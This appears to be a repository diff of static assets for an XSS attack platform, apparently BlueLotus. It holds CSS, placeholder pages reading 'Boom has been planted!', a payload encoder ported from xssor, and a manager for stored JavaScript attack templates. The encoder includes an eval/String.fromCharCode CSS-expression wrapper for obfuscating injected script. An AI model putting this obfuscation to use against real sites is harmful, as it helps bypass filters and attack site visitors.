height: 233px;
float: left;
}
#Ww_B_0_textarea {
width: 300px;
height: 230px;
}
#Ww_B_0_Right {
width: 245px;
height: 230px;
float: left;
overflow: hidden;
padding-left: 5px;
}
/* about us */
#about_detail {
height: 0px;
padding-bottom: 100%;
}
#about_us_banner {
background-attachment: fixed;
background-color: #272833;
background-image: url("../images/banner.png");
background-position: center center;
background-size: cover;
box-shadow: 0 0.25em 0.5em 0 rgba(0, 0, 0, 0.25);
min-height: 100vh;
position: relative;
text-align: center;
z-index: 21;
}
#firesun {
margin-top: 4em;
}
#about_us_banner .content {
overflow: auto;
display: inline-block;
margin-right: 1%;
max-width: 95%;
padding: 2em;
position: relative;
text-align: right;
vertical-align: middle;
z-index: 1;
}
#about_us_banner .content header {
display: inline-block;
vertical-align: middle;
margin: 0;
padding: 0;
border: 0;
font-size: 100%;
font: inherit;
}
#about_us_banner .content header h2 {
font-size: 2.5em;
margin: 0;
color: #ffffff;
font-weight: 300;
line-height: 1.5em;
letter-spacing: -0.025em;
}
#about_us_banner .content header p {
margin: 0.5em 0 0 0;
top: 0;
font-size: 1.25em;
line-height: 1.75em;
color: #ffffff;
position: relative;
}
#about_us_banner .content .image {
border-radius: 100%;
display: inline-block;
height: 18em;
margin-left: 3em;
vertical-align: middle;
width: 18em;
}
#about_us_banner a:link,
a:visited {
color:#FFFFFF;
text-decoration:underline;
}
#about_us_banner a:hover,
a:active {
color:#FFFFFF;
text-decoration:none;
}
#about_us_banner .content .image .img {
border-radius: 100%;
display: block;
width: 100%;
}
#about_us_banner .content .image {
border-radius: 100%;
display: inline-block;
height: 18em;
margin-left: 3em;
vertical-align: middle;
width: 18em;
}
#about_us_banner .content .logoimage .logoimg {
display: block;
width: 100%;
}
#about_us_banner .content .logoimage {
border-radius: 100%;
display: inline-block;
height: 18em;
margin-left: 3em;
vertical-align: middle;
width: 18em;
}
#about_us_banner .content .image .img {
border-radius: 100%;
display: block;
width: 100%;
}

281
static/css/notification.css
View File

@@ -1,176 +1,195 @@
#notifications-bottom-right {
position: absolute;
width: 360px;
right: 20px;
bottom: 40px;
position: absolute;
width: 360px;
right: 20px;
bottom: 40px;
}
.webpushtipoutter {
z-index:9999;
position:absolute;
right:5px;
bottom:5px;
_width:330px;
z-index: 9999;
position: absolute;
right: 5px;
bottom: 5px;
_width: 330px;
}
.webpushtipinner {
position:relative;
height:66px;
padding:7px;
position: relative;
height: 66px;
padding: 7px;
}
.newmailNotifyBox {
position:absolute;
bottom:0;
right:0;
z-index:5;
padding:8px 17px 7px 0;
overflow:hidden;
position: absolute;
bottom: 0;
right: 0;
z-index: 5;
padding: 8px 17px 7px 0;
overflow: hidden;
}
.newmailNotifyItem {
position:relative;
width:305px;
height:69px;
margin-bottom:10px;
padding:1px;
border-radius:5px;
-webkit-border-radius:5px;
box-shadow:0 2px 5px rgba(0,0,0,0.2);
-webkit-box-shadow:0 2px 5px rgba(0,0,0,0.2);
background:#ADBFC8;
background:-moz-linear-gradient(top,#C4D1D7,#98AFBA);
background:-webkit-gradient(linear,0 0,0 bottom,from(#C4D1D7),to(#98AFBA));
background:-o-linear-gradient(top,#C4D1D7,#98AFBA);
-moz-transition:box-shadow 1s;
position: relative;
width: 305px;
height: 69px;
margin-bottom: 10px;
padding: 1px;
border-radius: 5px;
-webkit-border-radius: 5px;
box-shadow: 0 2px 5px rgba(0,0,0,0.2);
-webkit-box-shadow: 0 2px 5px rgba(0,0,0,0.2);
background: #ADBFC8;
background: -moz-linear-gradient(top,#C4D1D7,#98AFBA);
background: -webkit-gradient(linear,0 0,0 bottom,from(#C4D1D7),to(#98AFBA));
background: -o-linear-gradient(top,#C4D1D7,#98AFBA);
-moz-transition: box-shadow 1s;
}
.newmailNotifyItem:hover .newmailNotify {
box-shadow:0 0 5px #8EC7EF inset;
-webkit-box-shadow:0 0 5px #8EC7EF inset;
box-shadow: 0 0 5px #8EC7EF inset;
-webkit-box-shadow: 0 0 5px #8EC7EF inset;
}
.newmailNotifyItem:hover .notify_type {
background:transparent;
*background:#EEF6F9;
background: transparent;
*background: #EEF6F9;
}
.newmailNotify {
height:66px;
background:#F7FDFF;
cursor:pointer;
border-radius:5px;
-webkit-border-radius:5px;
box-shadow:0 0 9px #E5EFF5 inset;
-webkit-box-shadow:0 0 9px #E5EFF5 inset;
height: 66px;
background: #F7FDFF;
cursor: pointer;
border-radius: 5px;
-webkit-border-radius: 5px;
box-shadow: 0 0 9px #E5EFF5 inset;
-webkit-box-shadow: 0 0 9px #E5EFF5 inset;
}
.newmailNotify .notify_close {
position:absolute;
top:-6px;
top:4px\9;
right:-6px;
right:4px\9;
width:15px;
height:15px;
height:14px\9;
overflow:hidden;
background:url(../images/mail.png) no-repeat -106px -18px #B6CFDA;
opacity:0;
filter:alpha(opacity=0);
border-radius:10px;
-webkit-border-radius:10px;
-moz-transition:opacity 0.2s ease;
-webkit-transition:opacity 0.1s ease;
_filter:alpha(opacity=100);
position: absolute;
top: -6px;
top: 4px\9;
right: -6px;
right: 4px\9;
width: 15px;
height: 15px;
height: 14px\9;
overflow: hidden;
background: url(../images/mail.png) no-repeat -106px -18px #B6CFDA;
opacity: 0;
filter: alpha(opacity=0);
border-radius: 10px;
-webkit-border-radius: 10px;
-moz-transition: opacity 0.2s ease;
-webkit-transition: opacity 0.1s ease;
_filter: alpha(opacity=100);
}
.newmailNotify:hover .notify_close:hover,.hover .notify_close:hover {
opacity:1;
filter:alpha(opacity=100);
opacity: 1;
filter: alpha(opacity=100);
}
.newmailNotify:hover .notify_close:active,.hover .notify_close:active {
opacity:1;
filter:alpha(opacity=100);
opacity: 1;
filter: alpha(opacity=100);
}
.newmailNotify:hover .notify_close,.hover .notify_close {
opacity:0.8;
filter:alpha(opacity=80);
opacity: 0.8;
filter: alpha(opacity=80);
}
.newmailNotify .notify_type {
position:relative;
float:left;
width:60px;
height:66px;
border-right:1px solid #CBDAE1;
background:#EEF6F9;
border-radius:5px 0 0 5px;
-webkit-border-radius:5px 0 0 5px;
position: relative;
float: left;
width: 60px;
height: 66px;
border-right: 1px solid #CBDAE1;
background: #EEF6F9;
border-radius: 5px 0 0 5px;
-webkit-border-radius: 5px 0 0 5px;
}
.newmailNotify .notify_type span {
display:inline-block;
width:32px;
height:34px;
margin:16px 0 0 16px;
background:url(../images/notify_letter.png) no-repeat;
display: inline-block;
width: 32px;
height: 34px;
margin: 16px 0 0 16px;
background: url(../images/notify_letter.png) no-repeat;
}
.newmailNotify .notify_type label {
position:absolute;
top:12px;
right:10px;
+right:5px;
text-align:center;
overflow:visible;
position: absolute;
top: 12px;
right: 10px;
+right: 5px;
text-align: center;
overflow: visible;
}
.newmailNotify .notify_type em {
display:inline-block;
cursor:pinter;
min-width:13px;
margin-right:-50%;
+margin-right:0;
padding:0 2px;
+padding:0 2px 2px;
border:1px solid white;
line-height:15px;
color:white;
font-weight:bold;
font-style:normal;
background:#D40707;
border-radius:8px;
-webkit-border-radius:8px;
background:-moz-linear-gradient(top,#E80505,#C70909);
background:-webkit-gradient(linear,0 0,0 bottom,from(#E80505),to(#C70909));
background:-o-linear-gradient(top,#E80505,#C70909);
display: inline-block;
cursor: pinter;
min-width: 13px;
margin-right: -50%;
+margin-right: 0;
padding: 0 2px;
+padding: 0 2px 2px;
border: 1px solid white;
line-height: 15px;
color: white;
font-weight: bold;
font-style: normal;
background: #D40707;
border-radius: 8px;
-webkit-border-radius: 8px;
background: -moz-linear-gradient(top,#E80505,#C70909);
background: -webkit-gradient(linear,0 0,0 bottom,from(#E80505),to(#C70909));
background: -o-linear-gradient(top,#E80505,#C70909);
}
@media screen and (-webkit-min-device-pixel-ratio:0) {
.newmailNotify .notify_type em {
border:none;
.newmailNotify .notify_type em {
border: none;
};
}
}.newmailNotify .notify_content {
margin-left:66px;
overflow:hidden;
width:230px;
.newmailNotify .notify_content {
margin-left: 66px;
overflow: hidden;
width: 230px;
}
.newmailNotify p {
margin:0;
padding:2px 0 1px;
white-space:normal;
white-space:nowrap\9;
_white-space:normal;
height:auto\9;
_height:16px;
_line-height:16px;
overflow:hidden;
text-overflow:ellipsis;
margin: 0;
padding: 2px 0 1px;
white-space: normal;
white-space: nowrap\9;
_white-space: normal;
height: auto\9;
_height: 16px;
_line-height: 16px;
overflow: hidden;
text-overflow: ellipsis;
}
@media screen and (-webkit-min-device-pixel-ratio:0) {
.newmailNotify p {
margin-top: 2px;
white-space:nowrap;
overflow:hidden;
text-overflow:ellipsis;
.newmailNotify p {
margin-top: 2px;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
};
}
}.newmailNotify .notify_location {
padding:7px 0 1px;
font-size:12px;
font-weight:bold;
.newmailNotify .notify_location {
padding: 7px 0 1px;
font-size: 12px;
font-weight: bold;
}
.newmailNotify .notify_digest {
color:#8596A9;
padding-top:2px
color: #8596A9;
padding-top: 2px;
}

1
static/fonts/index.html Normal file
View File

@@ -0,0 +1 @@
Boom has been planted!

BIN
static/images/avatar.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 285 KiB

BIN
static/images/banner.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.1 MiB

BIN
static/images/bluelotus.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 62 KiB

BIN
static/images/icon-menu-minimized.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 202 B

1
static/images/index.html Normal file
View File

@@ -0,0 +1 @@
Boom has been planted!

BIN
static/images/js_icon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.6 KiB

1
static/index.html Normal file
View File

@@ -0,0 +1 @@
Boom has been planted!

10
static/js/ZeroClipboard.min.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

BIN
static/js/ZeroClipboard.swf Normal file
View File

Binary file not shown.

11
static/js/ace.js Normal file
View File

File diff suppressed because one or more lines are too long

2123
static/js/beautify.js Normal file
View File

File diff suppressed because it is too large Load Diff

1
static/js/index.html Normal file
View File

@@ -0,0 +1 @@
Boom has been planted!

7
static/js/jqxcombobox.js Normal file
View File

File diff suppressed because one or more lines are too long

7
static/js/jqxinput.js Normal file
View File

File diff suppressed because one or more lines are too long

7
static/js/jqxsplitter.js Normal file
View File

File diff suppressed because one or more lines are too long

7
static/js/jqxtextarea.js Normal file
View File

File diff suppressed because one or more lines are too long

7
static/js/jqxtoolbar.js Normal file
View File

File diff suppressed because one or more lines are too long

326
static/js/js_encode.js Normal file
View File

@@ -0,0 +1,326 @@
//代码地址https://github.com/evilcos/xssor
//本人仅作一些小改动移植到xss平台上
//code by yuxi4n
$("#rwb_b2").click(function() {
knownxss.encode.en(16);
});
$("#rwb_b2_j").click(function() {
knownxss.encode.de(16);
});
$("#rwb_b1").click(function() {
knownxss.encode.en(10);
});
$("#rwb_b1_j").click(function() {
knownxss.encode.de(10);
});
$("#rwb_b3").click(function() {
knownxss.encode._escape();
});
$("#rwb_b3j").click(function() {
knownxss.encode._unescape();
});
$("#rwb_b4").click(function() {
knownxss.encode._encodeURI();
});
$("#rwb_b4j").click(function() {
knownxss.encode._decodeURI();
});
$("#rwb_b5").click(function() {
knownxss.encode.html2js(1);
});
$("#rwb_b5j").click(function() {
knownxss.encode.html2js(2);
});
$("#rwb_b6").click(function() {
knownxss.encode.htmlencode(1);
});
$("#rwb_b6j").click(function() {
knownxss.encode.htmlencode(2);
});
$("#rwb_b7").click(function() {
knownxss.encode.base64Code(1);
});
$("#rwb_b7j").click(function() {
knownxss.encode.base64Code(2);
});
$("#rwb_b8").click(function() {
knownxss.encode.replaceC();
});
function _g(x) {
return document.getElementById(x);
}
var knownxss = {
Author: 'yuxi4n',
time: '2008-12-01'
};
knownxss.encode = {};
knownxss.encode._escape = function() {
_g('Ww_B_0_textarea').value = escape(_g('Ww_B_0_textarea').value);
};
knownxss.encode._unescape = function() {
_g('Ww_B_0_textarea').value = unescape(_g('Ww_B_0_textarea').value);
};
knownxss.encode._encodeURI = function() {
_g('Ww_B_0_textarea').value = encodeURI(_g('Ww_B_0_textarea').value);
};
knownxss.encode._decodeURI = function() {
_g('Ww_B_0_textarea').value = decodeURI(_g('Ww_B_0_textarea').value);
};
knownxss.encode.en = function(x) {
var _a = new Array();
var txt = _g('Ww_B_0_textarea').value;
if (x == 10) {
for (var i = 0; i < txt.length; i++) {
var _a;
var s = txt.charCodeAt(i).toString(16);
if (_g('rwb_b1_c2').checked) _a += "&#" + new Array(7 - String(s).length).join("0") + txt.charCodeAt(i);
else if (_g('rwb_b1_c3').checked) _a += "&#" + txt.charCodeAt(i) + ";";
else if (_g('rwb_b1_c4').checked) {
if (i < txt.length - 1) _a += txt.charCodeAt(i) + ",";
else {
_a += txt.charCodeAt(i) + ",";
_a = "cos:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123," + _a + "59,119,105,110,100,111,119,46,120,61,49,59,125)))";
}
} else _a += txt.charCodeAt(i) + ",";
}
if (_a.substr(-1, 1) == ',') _a = _a.substr(0, _a.length - 1);
_g('Ww_B_0_textarea').value = _a;
}
if (x == 16) {
for (i = 0; i < txt.length; i++) {
s = txt.charCodeAt(i).toString(16);
if (_g('rwb_b2_c2').checked) _a += "&#x" + new Array(5 - String(s).length).join("0") + s + ";";
else _a += "\\u" + new Array(5 - String(s).length).join("0") + s;
}
_g('Ww_B_0_textarea').value = _a;
}
};
knownxss.encode.de = function(x) {
var _a = new Array();
var txt = _g('Ww_B_0_textarea').value;
if (x == 10) {
if (_g('rwb_b1_c2').checked) {
var s = txt.split("&");
for (i = 1; i < s.length; i++) {
s[i] = s[i].replace('#', '');
_a += String.fromCharCode(s[i]);
}
} else if (_g('rwb_b1_c3').checked) {
s = txt.split(";");
for (i = 0; i < s.length - 1; i++) {
s[i] = s[i].replace('&#', '');
_a += String.fromCharCode(s[i]);
}
} else if (_g('rwb_b1_c4').checked) {
txt = txt.substring(txt.indexOf("105,102,40,33,119,105,110,100,111,119,46,120,41,123,") + 52, txt.indexOf("59,119,105,110,100,111,119,46,120,61,49,59,125"));
s = txt.split(",");
for (i = 0; i < s.length; i++)
_a += String.fromCharCode(s[i]);
} else {
s = txt.split(",");
for (i = 0; i < s.length; i++)
_a += String.fromCharCode(s[i]);
}
_g('Ww_B_0_textarea').value = _a;
}
if (x == 16) {
if (_g('rwb_b2_c2').checked) {
var _a = new Array();
s = txt.split(";");
for (i = 0; i < s.length - 1; i++) {
s[i] = s[i].replace('&#x', '');
_a += String.fromCharCode(parseInt(s[i], 16));
}
} else {
var _a = new Array();
s = txt.split("\\");
for (var i = 1; i < s.length; i++) {
s[i] = s[i].replace('u', '');
_a += String.fromCharCode(parseInt(s[i], 16));
}
}
_g('Ww_B_0_textarea').value = _a;
}
};
knownxss.encode.copy_ok = function() {
_g('Ww_B_0_textarea').style.background = '#DDDDDD';
setTimeout("_g('Ww_B_0_textarea').style.background='#FFFFFF'", 700);
};
knownxss.encode.html2js = function(i) {
var txt = _g('Ww_B_0_textarea').value;
if (i == 1)
_g('Ww_B_0_textarea').value = "document.writeln(\"" + txt.replace(/\\/g, "\\\\").replace(/\//g, "\\/").replace(/\'/g, "\\\'").replace(/\"/g, "\\\"").split('\r\n').join("\");\ndocument.writeln(\"") + "\");";
if (i == 2)
_g('Ww_B_0_textarea').value = txt.replace(/document.writeln\("/g, "").replace(/"\);/g, "").replace(/\\\"/g, "\"").replace(/\\\'/g, "\'").replace(/\\\//g, "\/").replace(/\\\\/g, "\\");
};
knownxss.encode.htmlencode = function(i) {
var txt = _g('Ww_B_0_textarea').value;
if (i == 1)
_g('Ww_B_0_textarea').value = txt.replace(/&/g, '&amp;').replace(/\"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
if (i == 2)
_g('Ww_B_0_textarea').value = txt.replace(/&amp;/g, '&').replace(/&quot;/g, '\"').replace(/&lt;/g, '<').replace(/&gt;/g, '>');
};
var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var base64DecodeChars = new Array(-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57,
58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6,
7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36,
37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
knownxss.encode.base64encode = function(str) {
var out, i, len;
var c1, c2, c3;
len = str.length;
i = 0;
out = "";
while (i < len) {
c1 = str.charCodeAt(i++) & 0xff;
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt((c1 & 0x3) << 4);
out += "==";
break;
}
c2 = str.charCodeAt(i++);
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt((c2 & 0xF) << 2);
out += "=";
break;
}
c3 = str.charCodeAt(i++);
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
out += base64EncodeChars.charAt(c3 & 0x3F);
}
return out;
};
knownxss.encode.base64decode = function(str) {
var c1, c2, c3, c4;
var i, len, out;
len = str.length;
i = 0;
out = "";
while (i < len) {
do {
c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1)
break;
do {
c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c2 == -1);
if (c2 == -1)
break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61)
return out;
c3 = base64DecodeChars[c3];
} while (i < len && c3 == -1);
if (c3 == -1)
break;
out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));
do {
c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61)
return out;
c4 = base64DecodeChars[c4];
} while (i < len && c4 == -1);
if (c4 == -1)
break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
}
return out;
};
knownxss.encode.utf16to8 = function(str) {
var out, i, len, c;
out = "";
len = str.length;
for (i = 0; i < len; i++) {
c = str.charCodeAt(i);
if ((c >= 0x0001) && (c <= 0x007F)) {
out += str.charAt(i);
} else if (c > 0x07FF) {
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
} else {
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
}
}
return out;
};
knownxss.encode.utf8to16 = function(str) {
var out, i, len, c;
var char2, char3;
out = "";
len = str.length;
i = 0;
while (i < len) {
c = str.charCodeAt(i++);
switch (c >> 4) {
case 0:
case 1:
case 2:
case 3:
case 4:
case 5:
case 6:
case 7:
out += str.charAt(i - 1);
break;
case 12:
case 13:
char2 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
break;
case 14:
char2 = str.charCodeAt(i++);
char3 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0));
break;
}
}
return out;
};
knownxss.encode.base64Code = function(i) {
var txt = _g('Ww_B_0_textarea').value;
if (i == 1)
_g('Ww_B_0_textarea').value = knownxss.encode.base64encode(knownxss.encode.utf16to8(txt));
if (i == 2)
_g('Ww_B_0_textarea').value = knownxss.encode.utf8to16(knownxss.encode.base64decode(txt));
};
knownxss.encode.replaceC = function() {
var txt = _g('Ww_B_0_textarea').value;
var _t = new Array();
var oldV = _g('oldC').value;
var newV = _g('newC').value;
var s = txt.split(oldV);
if (s.length > 1) {
if (s[0] == '') {
for (var i = 1; i < s.length; i++)
_t += newV + s[i];
} else if (s[s.length - 1] == '') {
for (var i = 0; i < s.length - 1; i++)
_t += s[i] + newV;
} else {
for (var i = 0; i < s.length; i++)
if (i == s.length - 1) _t += s[i];
else
_t += s[i] + newV;
}
_g('Ww_B_0_textarea').value = _t;
}
};

299
static/js/jsmin.js Normal file
View File

@@ -0,0 +1,299 @@
/* jsmin.js - 2006-08-31
Author: Franck Marcia
This work is an adaptation of jsminc.c published by Douglas Crockford.
Permission is hereby granted to use the Javascript version under the same
conditions as the jsmin.c on which it is based.
jsmin.c
2006-05-04
Copyright (c) 2002 Douglas Crockford (www.crockford.com)
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
The Software shall be used for Good, not Evil.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Update:
add level:
1: minimal, keep linefeeds if single
2: normal, the standard algorithm
3: agressive, remove any linefeed and doesn't take care of potential
missing semicolons (can be regressive)
store stats
jsmin.oldSize
jsmin.newSize
*/
String.prototype.has = function(c) {
return this.indexOf(c) > -1;
};
function jsmin(input, level) {
var a = '',
b = '',
EOF = -1,
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
DIGITS = '0123456789',
ALNUM = LETTERS + DIGITS + '_$\\',
theLookahead = EOF;
/* isAlphanum -- return true if the character is a letter, digit, underscore,
dollar sign, or non-ASCII character.
*/
function isAlphanum(c) {
return c != EOF && (ALNUM.has(c) || c.charCodeAt(0) > 126);
}
/* get -- return the next character. Watch out for lookahead. If the
character is a control character, translate it to a space or
linefeed.
*/
function get() {
var c = theLookahead;
if (get.i == get.l) {
return EOF;
}
theLookahead = EOF;
if (c == EOF) {
c = input.charAt(get.i);
++get.i;
}
if (c >= ' ' || c == '\n') {
return c;
}
if (c == '\r') {
return '\n';
}
return ' ';
}
get.i = 0;
get.l = input.length;
/* peek -- get the next character without getting it.
*/
function peek() {
theLookahead = get();
return theLookahead;
}
/* next -- get the next character, excluding comments. peek() is used to see
if a '/' is followed by a '/' or '*'.
*/
function next() {
var c = get();
if (c == '/') {
switch (peek()) {
case '/':
for (;;) {
c = get();
if (c <= '\n') {
return c;
}
}
break;
case '*':
get();
for (;;) {
switch (get()) {
case '*':
if (peek() == '/') {
get();
return ' ';
}
break;
case EOF:
throw 'Error: Unterminated comment.';
}
}
break;
default:
return c;
}
}
return c;
}
/* action -- do something! What you do is determined by the argument:
1 Output A. Copy B to A. Get the next B.
2 Copy B to A. Get the next B. (Delete A).
3 Get the next B. (Delete B).
action treats a string as a single character. Wow!
action recognizes a regular expression if it is preceded by ( or , or =.
*/
function action(d) {
var r = [];
if (d == 1) {
r.push(a);
}
if (d < 3) {
a = b;
if (a == '\'' || a == '"') {
for (;;) {
r.push(a);
a = get();
if (a == b) {
break;
}
if (a <= '\n') {
throw 'Error: unterminated string literal: ' + a;
}
if (a == '\\') {
r.push(a);
a = get();
}
}
}
}
b = next();
if (b == '/' && '(,=:[!&|'.has(a)) {
r.push(a);
r.push(b);
for (;;) {
a = get();
if (a == '/') {
break;
} else if (a =='\\') {
r.push(a);
a = get();
} else if (a <= '\n') {
throw 'Error: unterminated Regular Expression literal';
}
r.push(a);
}
b = next();
}
return r.join('');
}
/* m -- Copy the input to the output, deleting the characters which are
insignificant to JavaScript. Comments will be removed. Tabs will be
replaced with spaces. Carriage returns will be replaced with
linefeeds.
Most spaces and linefeeds will be removed.
*/
function m() {
var r = [];
a = '\n';
r.push(action(3));
while (a != EOF) {
switch (a) {
case ' ':
if (isAlphanum(b)) {
r.push(action(1));
} else {
r.push(action(2));
}
break;
case '\n':
switch (b) {
case '{':
case '[':
case '(':
case '+':
case '-':
r.push(action(1));
break;
case ' ':
r.push(action(3));
break;
default:
if (isAlphanum(b)) {
r.push(action(1));
} else {
if (level == 1 && b != '\n') {
r.push(action(1));
} else {
r.push(action(2));
}
}
}
break;
default:
switch (b) {
case ' ':
if (isAlphanum(a)) {
r.push(action(1));
break;
}
r.push(action(3));
break;
case '\n':
if (level == 1 && a != '\n') {
r.push(action(1));
} else {
switch (a) {
case '}':
case ']':
case ')':
case '+':
case '-':
case '"':
case '\'':
if (level == 3) {
r.push(action(3));
} else {
r.push(action(1));
}
break;
default:
if (isAlphanum(a)) {
r.push(action(1));
} else {
r.push(action(3));
}
}
}
break;
default:
r.push(action(1));
break;
}
}
}
return r.join('');
}
var ret = m(input);
return ret;
}

460
static/js/loadjstemplate.js Normal file
View File

@@ -0,0 +1,460 @@
//myjs的插入模板功能需要知道jsTemplate的内容故设为全局变量
var jsTemplate_source;
var jsTemplate_dataAdapter;
$(document).ready(function() {
var base_height = $("#nav-section").height() - $("#dash-logo").outerHeight(true);
////////////////
//分割栏初始化//
////////////////
$("#jsTemplate_splitter").jqxSplitter({
width: '100%',
height: base_height > 0 ? base_height : 0,
panels: [{
size: '400px'
}]
});
////////////////
//js列表初始化//
////////////////
var jsTemplate_last_select_index = -1;
var jsTemplate_is_select_rollback = false;
var jsTemplate_last_select_name = "";
//数据源与datafields
jsTemplate_source = {
datatype: "json",
datafields: [{
name: "js_uri"
}, {
name: "js_name"
}, {
name: "js_description"
}, {
name: "js_name_abbr"
}, {
name: "js_description_abbr"
}, ],
id: "js_name",
url: urlbase + "?js_template_cmd=list",
};
jsTemplate_dataAdapter = new $.jqx.dataAdapter(jsTemplate_source, {
loadComplete: function() {
if (jsTemplate_last_select_name !== "") {
$("#jsTemplate_listbox").jqxListBox('selectItem', jsTemplate_last_select_name);
jsTemplate_last_select_name = "";
}
}
});
$('#jsTemplate_listbox').jqxListBox({
selectedIndex: -1,
source: jsTemplate_dataAdapter,
displayMember: "js_name",
valueMember: "js_name",
itemHeight: 60,
width: '100%',
height: base_height - 29 > 0 ? base_height - 29 : 0,
renderer: function(index, label, value) {
//注js_name_abbr与js_description_abbr经过了stripStr
var datarecord = jsTemplate_dataAdapter.records[index];
var imgurl = 'static/images/js_icon.png';
var img = '<img height="50" width="50" src="' + imgurl + '"/>';
var table = '<table class="listbox_item_table"><tr><td class="listbox_item_img" rowspan="2">' + img + '</td><td class="listbox_item_name">' + datarecord.js_name_abbr + '.js</td></tr><tr><td class="listbox_item_description">' + datarecord.js_description_abbr + '</td></tr></table>';
return table;
}
});
$('#jsTemplate_listbox').on('select', function(event) {
jsTemplate_update_form(event.args.index);
});
//////////////////
//js列表相关函数//
//////////////////
//清空编辑表单
function jsTemplate_clear_form() {
$('#jsTemplate_name').val("");
$('#jsTemplate_description').val("");
jsTemplate_editor.setValue("", -1);
$('#jsTemplate_form').data('changed', false);
}
//根据列表选中的index加载编辑表单
function jsTemplate_update_form(current_select_index) {
if (jsTemplate_is_select_rollback) {
jsTemplate_is_select_rollback = false;
return;
}
if ($('#jsTemplate_form').data('changed')) {
if (confirm("------------------------------------\n提示未保存的内容将会丢失\n------------------------------------\n\n确认离开吗")) {
$('#jsTemplate_form').data('changed', false);
jsTemplate_last_select_index = current_select_index;
} else {
jsTemplate_is_select_rollback = true;
$('#jsTemplate_listbox').jqxListBox('selectIndex', jsTemplate_last_select_index);
return;
}
} else {
jsTemplate_last_select_index = current_select_index;
}
//index为-1代表list没有选中项现在是新增一个js
if (current_select_index === -1) {
$('#jsTemplate_ok').text('新增');
jsTemplate_clear_form();
}
//index为大于0代表现在是修改一个js
else {
$('#jsTemplate_ok').text('修改');
var datarecord = jsTemplate_dataAdapter.records[current_select_index];
$('#jsTemplate_name').val(datarecord.js_name);
$('#jsTemplate_description').val(datarecord.js_description);
jsTemplate_update_content(datarecord.js_name);
}
}
//根据列表选中的index将对应js的内容加载到编辑器中
function jsTemplate_update_content(filename) {
$('#jsTemplate_form').data('changed', false);
jsTemplate_editor.setReadOnly(true);
$.ajax({
url: urlbase + "?js_template_cmd=get&name=" + filename,
dataType: "json",
timeout: interval,
success: function(data) {
jsTemplate_editor.setValue(data, -1);
$('#jsTemplate_form').data('changed', false);
jsTemplate_editor.setReadOnly(false);
},
complete: function(XMLHttpRequest, status) {
if (status == 'timeout') {
alert("载入超时!");
} else if (status == "parsererror") {
window.location.href = "login.php";
}
}
});
}
//重新载入js列表
function reload_jsTemplate_listbox() {
$('#jsTemplate_form').data('changed', false);
jsTemplate_dataAdapter.dataBind();
}
//////////////////////
//js列表工具栏初始化//
//////////////////////
